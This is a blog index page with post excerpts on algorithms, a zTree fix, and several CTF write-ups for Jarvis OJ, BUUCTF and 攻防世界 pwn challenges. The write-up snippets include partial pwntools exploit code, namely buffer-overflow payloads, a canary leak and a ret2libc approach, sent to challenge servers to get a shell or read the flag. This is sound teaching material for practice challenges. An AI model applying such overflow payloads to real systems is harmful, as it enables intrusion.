- 博客(13)
- 收藏
- 关注
RSS订阅原创 zTree 自定义 icon 点击后失效的问题
项目场景:尚硅谷 —— 尚筹网项目问题描述zTree 自定义 icon 点击后失效。此时的 addDiyDom 如下:addDiyDom: function (treeId, treeNode) { var icoObj = $("#" + treeNode.tId + "_ico"); if (treeNode.icon) { icoObj.removeClass().addClass(treeNode.icon); }}原因分析:通过源码
2022-05-15 00:51:49
483
原创 动态规划——租用游艇问题
题目来源:王晓东,《算法设计与分析》长江游艇俱乐部在长江上设置了n个游艇出租站1,2,…,n。游客可在这些游艇出租站租用游艇,并在下游的任何一个游艇出租站归还游艇。游艇出租站i到游艇出租站j之间的租金为r(i,j),1<=i<j<=n。试设计一个算法,计算出从游艇出租站1 到游艇出租站n所需的最少租金。输入格式:第1 行中有1 个正整数n(n<=200),表示有n个游艇出租站。接下来的第1到第n-1 行,第i行表示第i站到第i+1站,第i+2站, … , 第n站的租金。输出格
2020-10-08 16:56:52
719
原创 动态规划——单调递增最长子序列
设计一个O(n2)时间的算法,找出由n个数组成的序列的最长单调递增子序列。输入格式:输入有两行: 第一行:n,代表要输入的数列的个数 第二行:n个数,数字之间用空格格开输出格式:最长单调递增子序列的长度输入样例:在这里给出一组输入。例如:51 3 5 2 9输出样例:在这里给出相应的输出。例如:4想到的思路是从前往后填表的方式,m表记录当前位置的最长子序列。AC代码:import java.util.Scanner;public class Main { pu
2020-10-08 16:53:35
619
3
原创 Jarvis OJ-PWN
pwnTest_Your_MemoryTest_Your_Memory题目名字和题目没啥关系,真·一点关系也没有。提供了system()函数并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。from pwn import *r=remote('pwn2.jarvisoj.com',9876)e=ELF('./memory')sys_a
2020-08-08 17:36:16
203
原创 素数环(1-20)
题目要求:将1,2,3,…,20这20个数围成一圈,使相邻的两数之和均为素数。思考:这样的环显然不止一种,如果要输出所有环,那么就要按照一定顺序,一定原则来输出。为了方便思考,不妨就假设第一个元素为1,能与1相邻且和为素数的有2,4,10,12,16;如果将2放置在1之后,紧接着要寻找能与2相邻且和为素数的数,这与前面的步骤相仿,显然可以用递归来实现,而且这种逻辑与图的深度优先遍历不谋而合。假如1,2的顺序已经遍历完了,那么紧接着要遍历1,4,这就要想到2遍历完之后要回到起点1,这就是回溯的思想了
2020-08-08 00:49:50
3069
原创 攻防世界进阶区pwn1
拿到题目checksec一下,发现开了canary保护。分析源程序,也很容易找到溢出点,题目开了canary,很显然v6就是canary,s与v6的距离为0x90-0x8=0x88.题目得逻辑也很简单,输入1进行read操作,2进行puts,3退出。那么思路就很清楚了,通过read填充0x88个a,然后通过puts打印,因为puts碰到\x00才会停止打印,那么就会有疑惑了,众所周知canary的最后一个字节为\x00,那打印0x88个’a’之后不是直接停止打印了吗?后来用gdb看了一下发现cana
2020-06-06 10:53:23
292
原创 BUUCTF-PWN刷题日记(二)
BUUCTF-PWN刷题日记ciscn_2019_n_8not_the_same_3dsctf_2016ciscn_2019_n_8送分题…'''Author:3nc0deDate:2020/05/15'''from pwn import *r = process('./pwn')#r = remote('node3.buuoj.cn', port)payload=p32(0x11)*14r.sendline(payload)r.interactive()not_the
2020-05-15 11:11:27
299
原创 攻防世界PWN进阶区pwn100/pwn200/warmup
攻防世界PWN进阶区pwn200pwn100pwn200和CTFWIKI上的ret2libc3大同小异。条件:1.有read(),write()函数,无system。2.在函数sub_8048484中存在栈溢出。思路:1.通过栈溢出调用write()函数泄露write()对应的 got 表项的内容,此处将write函数的返回地址设置为main或者sub_8048484的地址以便再次利用栈溢出漏洞2.通过LibcSearcher获取libc版本3.获取system函数,”/bi
2020-05-12 15:58:17
483
1
原创 BUUCTF-PWN刷题日记(一)
BUUCTF-PWN刷题日记riprip简单的栈溢出#coding=utf-8from pwn import*#r = process('./pwn1')r = remote('node3.buuoj.cn',26123)sys_addr = 0x401186#address of funpayload = 'a'*(0xf+8) + p64(sys_addr)r.sendli...
2020-04-30 22:44:22
1256
原创 WUST-CTF2020(武汉科技大学第一届"WUST-CTF"网络安全竞赛)WP
WUST-CTF2020Webcheck inadmin(不会web勉强做出)PWNgetshellgetshell2number gameCrypto大数运算B@se情书babyrsa佛说:只能四天MISC比赛规则Space ClubWelcomegirlfriend爬ShopRECr0ssFunlevel1level2level3Webcheck in修改maxlength,删除按钮的d...
2020-03-30 19:57:40
3482
原创 攻防世界PWN新手区WP
攻防世界PWNget shellwhen did you bornhello_pwnlevel2待更新get shellnc + 地址直接连接cat flagwhen did you born运行一遍,报错,段错误,栈溢出拖进IDA可以观察到当v5==1926的时候就会cat flag但是当v5 == 1926 的时候又会报错观察到这里还有一个v4而且是栈溢出的点不妨点进去...
2020-02-23 00:27:25
1581
原创 攻防世界Android新手区部分WP(持续更)
攻防世界AndroidAPP1easy-apk待更APP1作为一名安卓逆向小萌新,上来先走一波模拟器,发现这题和之前做的Windows逆向某些题目差不多——输入flag验证是否正确。既然是逆向,接下来就要想办法得到他的源码,类似于ida,这里安卓用到安卓逆向工具JEB。用JEB打开后,查看MainActicity,(类似于IDA找main函数)阅读这一段代码,可以得知我们输入的字符...
2020-02-22 14:50:58
279
原创 攻防世界RE新手区部分WP(持续更)
攻防世界REinsanityopen-sourcesimple-unpacklogmein待更新insanity对新手及其又好的送分题1.拖进IDA2.Shift+F123.Ctrl+F输入flag得到flag9447{This_is_a_flag}open-source#include <stdio.h>#include <string.h>int...
2020-01-13 20:22:00
489
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人